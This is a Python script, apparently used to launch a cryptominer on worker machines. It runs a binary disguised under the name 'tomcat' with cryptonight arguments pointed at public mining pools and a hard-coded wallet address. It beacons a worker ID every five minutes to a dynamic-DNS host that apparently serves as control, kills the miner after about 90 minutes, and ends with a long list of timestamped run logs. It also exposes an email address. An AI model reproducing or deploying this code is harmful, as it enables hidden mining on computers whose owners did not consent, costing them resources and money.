import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:05.439158
#2018-02-17 16:43:07.822057
#2018-02-17 18:29:03.289985
#2018-02-17 20:18:05.325149
#2018-02-17 22:05:01.298356
#2018-02-17 23:49:04.918598
#2018-02-18 01:39:07.211748
#2018-02-18 03:26:05.869526
#2018-02-18 05:15:07.061649
#2018-02-18 07:07:03.494593
#2018-02-18 08:55:07.462827
#2018-02-18 10:42:03.566906
#2018-02-18 12:26:04.221273
#2018-02-18 14:14:04.251001
#2018-02-18 16:04:04.418505
#2018-02-18 17:53:03.948648
#2018-02-18 19:39:07.678165
#2018-02-18 21:24:07.123678
#2018-02-18 23:13:07.405244
#2018-02-19 00:59:03.781090
#2018-02-19 02:47:03.927577
#2018-02-19 04:32:06.566667
#2018-02-19 06:17:06.774474
#2018-02-19 08:05:01.362496
#2018-02-19 09:55:01.449959
#2018-02-19 11:44:02.091273
#2018-02-19 13:31:04.624580
#2018-02-19 15:19:08.070459
#2018-02-19 17:07:08.760008
#2018-02-19 18:52:02.154392
#2018-02-19 20:40:08.520831
#2018-02-19 22:26:07.486454
#2018-02-20 00:12:01.484180
#2018-02-20 01:59:01.581599
#2018-02-20 03:49:01.496419
#2018-02-20 05:33:06.994547
#2018-02-20 07:17:01.851905
#2018-02-20 09:03:07.152084
#2018-02-20 10:45:09.011451
#2018-02-20 12:33:09.109821
#2018-02-20 14:18:08.852237
#2018-02-20 16:03:08.842770
#2018-02-20 17:49:05.991324
#2018-02-20 19:40:09.664600
#2018-02-20 21:27:07.787165
#2018-02-20 23:10:06.798359
#2018-02-21 00:55:06.308850
#2018-02-21 02:39:07.367748
#2018-02-21 04:27:04.396971
#2018-02-21 06:15:06.977113
#2018-02-21 08:01:01.985186
#2018-02-21 09:46:04.997029
#2018-02-21 11:36:01.444325
#2018-02-21 13:24:09.765223
#2018-02-21 15:09:05.865561
#2018-02-21 16:58:05.929957
#2018-02-21 18:46:07.460648
#2018-02-21 20:36:01.522933
#2018-02-21 22:21:04.127358
#2018-02-22 00:12:09.196704
#2018-02-22 02:01:04.463815
#2018-02-22 03:47:05.292195
#2018-02-22 05:34:02.107451
#2018-02-22 07:19:02.083889
#2018-02-22 09:06:05.120171
#2018-02-22 10:54:06.829342
#2018-02-22 12:40:03.775253
#2018-02-22 14:26:01.582326
#2018-02-22 16:12:08.287052
#2018-02-22 17:57:01.892258
#2018-02-22 19:46:07.429478
#2018-02-22 21:35:09.037021
#2018-02-22 23:22:04.147141
#2018-02-23 01:08:08.227261
#2018-02-23 02:54:07.962395
#2018-02-23 04:42:05.567216
#2018-02-23 06:27:07.205234
#2018-02-23 08:16:02.057124
#2018-02-23 10:32:04.886681
#2018-02-23 12:26:07.641992
#2018-02-23 14:15:12.384989
#2018-02-23 16:06:08.341088
#2018-02-23 17:53:01.535200
#2018-02-23 19:38:04.593859
#2018-02-23 21:21:01.545279
#2018-02-23 23:08:07.625021
#2018-02-24 00:49:01.862473
#2018-02-24 02:39:06.168807
#2018-02-24 04:33:07.869745
#2018-02-24 06:18:06.544392
#2018-02-24 08:06:03.729723
#2018-02-24 09:50:06.827764
#2018-02-24 11:45:01.976191
#2018-02-24 13:35:08.258760
#2018-02-24 15:23:05.961925
#2018-02-24 17:12:04.154710
#2018-02-24 19:04:05.707253
#2018-02-24 20:53:03.724987
#2018-02-24 23:13:06.996150
#2018-02-25 02:38:01.607728
#2018-02-25 06:19:05.256890
#2018-02-25 11:40:09.291105